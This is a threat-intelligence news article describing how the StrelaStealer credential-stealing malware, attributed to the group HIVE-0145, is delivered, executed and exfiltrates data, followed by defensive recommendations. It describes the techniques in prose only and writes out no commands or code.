Security researchers have detailed the evolving tactics, techniques, and procedures (TTPs) of StrelaStealer, a sophisticated information-stealing malware wreaking havoc since its debut in 2022.
StrelaStealer, also known as “Strela,” is engineered to exfiltrate email credentials from widely used clients such as Microsoft Outlook and Mozilla Thunderbird, and continues to pose a significant threat, particularly across Europe and the United States.
Financially Motivated HIVE-0145 Group Drives Global Campaigns
Recent investigative efforts have attributed StrelaStealer’s operations to the threat actor group HIVE-0145, an entity flagged for credential theft and espionage-motivated campaigns.
Thought to function as a financially driven initial access broker (IAB), HIVE-0145 is believed to be the primary operator behind StrelaStealer, orchestrating mass phishing campaigns to deliver the malware to more than 100 organizations, with particular targeting in Italy, Spain, Germany, and Ukraine.
StrelaStealer campaigns predominantly use email-based social engineering. Victims receive ZIP attachments containing obfuscated JavaScript files, which, when executed, initiate a sequence of malicious activities.
The JavaScript executes a CertUtil decoding step, facilitating retrieval and execution of a DLL payload directly into memory a technique that sidesteps disk-based detection and complicates forensic analysis.
The malware employs Windows native utilities like rundll32.exe and regsvr32.exe for payload execution, tactics aligned with system binary proxy execution techniques aimed at evading endpoint defenses.
Analysis of recent StrelaStealer campaigns reveals continuous adaptation in both delivery vectors and payload obfuscation.
In a high-profile campaign reported in March 2024, researchers observed malicious ZIP files containing JavaScript that downloaded and invoked highly obfuscated DLLs.
These payloads incorporated anti-analysis routines and alternate attachment formats to bypass detection by signature-based security tools.
Evolving Delivery Methods and Obfuscation Challenge Security Teams
By November 2024, attackers behind StrelaStealer had further refined their methods, embedding the initial JavaScript loader with calls to WScript, which spawned an encoded PowerShell command.
This command mapped a WebDAV network share via the “net use” utility enabling remote DLL payload registration and execution using regsvr32.exe.
Such proxy execution via native Windows tools offers dual advantages: blending with legitimate system activity and complicating detection efforts.
Post-infection, StrelaStealer’s focus shifts to reconnaissance and exfiltration.
The malware systematically inventories system information, enumerates installed software, checks locale settings, verifies internet connectivity, and traverses the file system.
Harvested credentials and reconnaissance data are exfiltrated over unencrypted HTTP POST requests, further lowering the detection threshold for exfiltration activity by blending with routine web traffic.
To counter StrelaStealer, cybersecurity vendors like AttackIQ have developed emulation attack graphs simulating the full sequence of TTPs associated with this malware.
These tools enable organizations to validate and optimize their defensive measures against StrelaStealer’s behaviors in a controlled environment, ensuring greater resilience against credential theft campaigns.
Security experts emphasize the importance of robust detection and mitigation strategies, particularly focusing on ingress tool transfer, system binary proxy execution, and continuous validation of endpoint and network security controls.
Specific attention is recommended for monitoring anomalous use of native Windows utilities, scrutinizing encoded PowerShell payloads, and deploying network intrusion prevention systems to thwart malicious download and execution attempts.
With StrelaStealer’s operators continually refining their evasion techniques and delivery strategies, ongoing threat intelligence and adaptive security validation remain critical.
Organizations are urged to integrate these advanced emulation tools and detection signatures into their security programs to effectively combat this evolving email credential theft threat.
Find this Story Interesting! Follow us on LinkedIn and X to Get More Instant Updates
 of StrelaStealer, a sophisticated information-stealing malware.){kind=link}